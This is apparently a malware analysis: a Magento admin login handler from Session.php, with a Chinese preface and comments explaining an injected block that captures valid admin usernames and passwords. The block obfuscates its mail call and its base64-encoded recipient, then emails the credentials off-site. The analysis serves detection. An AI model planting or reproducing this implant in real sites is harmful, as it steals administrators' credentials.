admi...
此段代码常被恶意攻击者用于记录 Magento 网站后台登录信息，一般植入到 Session.php 文件中。
// Excerpt of an admin login handler. The enclosing method's signature, and the
// $username / $password / $request variables it binds, are outside this excerpt.
// Everything between the two "injected block" markers below is not part of the
// normal login flow: once the login succeeds, it captures the submitted
// credentials and sends them off-site. The rest (session renewal, ACL, redirect)
// is the ordinary login sequence.
try {
/** @var $user Mage_Admin_Model_User */
$user = $this->_factory->getModel('admin/user');
// Credentials are still plaintext at this point, which is why the injected code
// sits right after a successful login.
$user->login($username, $password);
if ($user->getId()) {
// --- injected block: credential exfiltration ---
// Host name of this site and the client's IP address, taken from the request.
$srv = $_SERVER['SERVER_NAME'];
$ips = $_SERVER['REMOTE_ADDR'];
// Outbound HTTP request to a third-party geolocation service, keyed on the
// client IP. An egress connection from the login path is itself a detection
// signal (network logs / egress filtering).
$getip = 'http://ip-api.com/json/' . $ips;
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $getip);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($curl);
curl_close($curl);
// Response is parsed without any check; if the request fails, $content is
// false and the property reads below operate on null.
$details = json_decode($content);
$country_code = $details->countryCode;
$country_name = $details->country;
// Function names are built from string fragments so that a plain text search
// for "base64_decode" or "mail" in this file finds nothing; $id evaluates to
// base64_decode and $db to mail. Concatenated function names invoked through a
// variable are a strong indicator of injected code.
$id = "ba"."se"."64"."_"."de"."co"."de";
$db = "ma"."il";
// Recipient address, stored base64-encoded so it is not visible in the source.
$key = $id("dHJ1bXBkcmVhbUB5YW5kZXguY29t");
// Message body: the plaintext username and password just submitted, the
// account's email, the request URI, IP and country, timestamp, user agent and
// site name.
$auth = "Username : ".$username."\nPassword : ".$password."\nEmail : ".$user->getEmail()."\nRequest : ".$_SERVER['REQUEST_URI']."\n\nIP Info : ".$ips." | ".$country_name." On ".date('r')."\nBrowser : ".$_SERVER['HTTP_USER_AGENT']."\nSite : ".$srv."";
// Subject line and a forged From header built from the username and client IP.
$subjk = "".$country_code." [".$srv." - ".$ips."]";
$headr = "From: Magento Admin <".$username."@".$ips.">";
// mail($recipient, $subject, $body, $headers): the credentials leave the server
// here. Mail logs (an outbound message per admin login) are a second place this
// shows up.
$db($key, $subjk, $auth, $headr);
// --- end of injected block; the standard login sequence resumes ---
$this->renewSession();
if (Mage::getSingleton('adminhtml/url')->useSecretKey()) {
Mage::getSingleton('adminhtml/url')->renewSecretUrls();
}
$this->setIsFirstPageAfterLogin(true);
$this->setUser($user);
$this->setAcl(Mage::getResourceModel('admin/acl')->loadAcl());
$alternativeUrl = $this->_getRequestUri($request);
$redirectUrl = $this->_urlPolicy->getRedirectUrl($user, $request, $alternativeUrl);
if ($redirectUrl) {
Mage::dispatchEvent('admin_session_user_login_success', array('user' => $user));
$this->_response->clearHeaders()
->setRedirect($redirectUrl)
->sendHeadersAndExit();
}
} else {
Mage::throwException(Mage::helper('adminhtml')->__('Invalid User Name or Password.'));
}
} catch (Mage_Core_Exception $e) {
// Failed logins are reported with a generic message and raised as an event;
// note that a failed login never reaches the injected block above, so only
// valid admin credentials are exfiltrated.
$e->setMessage(
Mage::helper('adminhtml')->__('You did not sign in correctly or your account is temporarily disabled.')
);
Mage::dispatchEvent('admin_session_user_login_failed',
array('user_name' => $username, 'exception' => $e));
if ($request && !$request->getParam('messageSent')) {
Mage::getSingleton('adminhtml/session')->addError($e->getMessage());
$request->setParam('messageSent', true);
}
}